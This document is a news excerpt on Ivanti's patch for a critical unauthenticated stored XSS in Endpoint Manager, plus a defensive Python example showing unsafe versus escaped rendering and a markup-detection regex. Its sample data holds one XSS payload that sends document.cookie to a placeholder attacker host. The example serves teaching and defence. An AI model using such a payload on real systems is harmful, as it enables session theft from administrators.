Ivanti EPM Update Patches Critical Remote Code Execution Flaw
securityweek
The stored XSS vulnerability could allow unauthenticated remote attackers to execute arbitrary JavaScript in the browser session of an EPM administrator.


Ivanti on Tuesday announced patches for four vulnerabilities in Endpoint Manager (EPM), including a critical-severity flaw leading to remote code execution (RCE).
The security defect, tracked as CVE-2025-10573 (CVSS score of 9.6), is described as a stored cross-site scripting (XSS) issue that can be exploited without authentication.
Ivanti EPM provides organizations with remote administration, vulnerability scanning, and management of connected systems, and it includes an API that consumes device scan data.
The critical EPM vulnerability allows attackers to submit device scan data containing malicious payloads that would be processed and embedded in the web dashboard, says Rapid7, which discovered and reported the bug in August.
When an administrator accesses the dashboard interface and views the device information, the payload triggers client-side JavaScript execution, allowing the attacker to gain control of the administrator’s session, the company ...
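The mechanism described above, stored XSS via an ingest API whose data is later rendered in an admin dashboard, reduces to one missing step: contextual output encoding. The following is an added illustration written for this page, not Ivanti's or Rapid7's code, and it does not reproduce the real EPM API, field names, or payload. It uses a constructed scan record whose hostname field carries markup, renders it the unsafe way and the safe way, and includes a small hunting check a defender could run over already-stored records to find fields that look like markup.

```python
import html
import re

# Constructed sample scan records, shaped like what a scan-ingest API might
# accept. Illustrative only; not real EPM data and not the reported payload.
SAMPLE_SCANS = [
    {"device_id": "dev-001", "hostname": "ws-finance-01", "os": "Windows 11"},
    {"device_id": "dev-002",
     "hostname": "<img src=x onerror=\"fetch('https://attacker.example/?c='+document.cookie)\">",
     "os": "Windows 10"},
    {"device_id": "dev-003", "hostname": "srv-db-01", "os": "Ubuntu 22.04"},
]


def render_device_row_vulnerable(scan):
    # Attacker-controlled fields are concatenated straight into HTML.
    # Whatever was stored by the ingest API runs in the viewer's browser.
    return (f"<tr><td>{scan['device_id']}</td>"
            f"<td>{scan['hostname']}</td>"
            f"<td>{scan['os']}</td></tr>")


def render_device_row_safe(scan):
    # Same row, but every untrusted value is HTML-entity encoded for the
    # text-content context it lands in. html.escape also encodes quotes.
    return (f"<tr><td>{html.escape(scan['device_id'])}</td>"
            f"<td>{html.escape(scan['hostname'])}</td>"
            f"<td>{html.escape(scan['os'])}</td></tr>")


def render_dashboard(scans, renderer):
    """Build the device table the administrator would view."""
    rows = "\n".join(renderer(s) for s in scans)
    return f"<table>\n{rows}\n</table>"


# Hunting heuristic for stored data: tag openers, inline event handlers,
# and javascript: URLs. Broad on purpose; results are for triage, not blocking.
MARKUP_RE = re.compile(r"<\s*/?\s*[a-zA-Z!]|\bon[a-z]+\s*=|javascript:", re.IGNORECASE)


def find_suspicious_scans(scans):
    """Return (device_id, field) pairs whose string values look like markup."""
    hits = []
    for scan in scans:
        for field, value in scan.items():
            if isinstance(value, str) and MARKUP_RE.search(value):
                hits.append((scan["device_id"], field))
    return hits


if __name__ == "__main__":
    print("--- vulnerable rendering ---")
    print(render_dashboard(SAMPLE_SCANS, render_device_row_vulnerable))
    print("--- safe rendering ---")
    print(render_dashboard(SAMPLE_SCANS, render_device_row_safe))
    print("--- suspicious stored records ---")
    print(find_suspicious_scans(SAMPLE_SCANS))
```

Two caveats a practitioner would add. Encoding is context-specific: `html.escape` is right for text content and quoted attribute values, but a value placed inside a script block, a URL, or an event handler attribute needs the encoding for that context, and a templating engine with auto-escaping is the reliable way to get it everywhere. Second, since the impact described above is session takeover, marking the session cookie HttpOnly and serving a restrictive Content-Security-Policy do not fix the bug but shrink what a successful payload can do.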
Copyright of this story belongs to SecurityWeek; the full text is available on the SecurityWeek site.

